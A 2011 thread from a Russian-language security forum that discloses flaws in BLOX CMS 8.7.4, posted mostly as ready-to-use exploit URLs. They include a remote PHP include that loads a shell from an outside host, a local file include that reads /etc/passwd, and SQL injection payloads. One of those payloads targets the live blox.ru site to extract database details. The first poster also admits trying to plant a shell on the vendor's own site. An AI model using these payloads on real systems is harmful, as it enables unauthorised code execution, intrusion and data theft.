RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   BLOX CMS (https://rdot.org/forum/showthread.php?t=1185)

[Dark Green] 01.02.2011 14:56

BLOX CMS
 
Офф. сайт: Blox.ru | Информация о CMS
Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность :D Поэтому я ограничелся несколькими критическими уязвимостями =)
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
[PHP-Include REMOTE]
BLOX\functions\go.php[8]
register_globals=ON
Код:

http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]
BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]
register_globals=ON
Код:

http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]
BLOX\functions\go.php[29, 119-142]
Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.
Код:

http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
От заливки шелла на офф сайт проекта админов спас надежный антихек хостинг - sweb.ru... мать его... (=

~d0s~ 01.02.2011 16:15

JRXSYSTEM
OMG! Во-первых,баг не твой http://www.hack0wn.com/view.php?xroot=1660.0&cat=exploits
Во-вторых,ето другая кмс bloxcms.com а не ru ,как в посте дарк_грина =\
Так что двойной фейл.

p/s/ http://blox.ru/?page=3+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat((select+c oncat_ws(0x3a,user(),database(),version())),floor( rand(0)*2)))--+


Часовой пояс GMT +3, время: 04:33.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot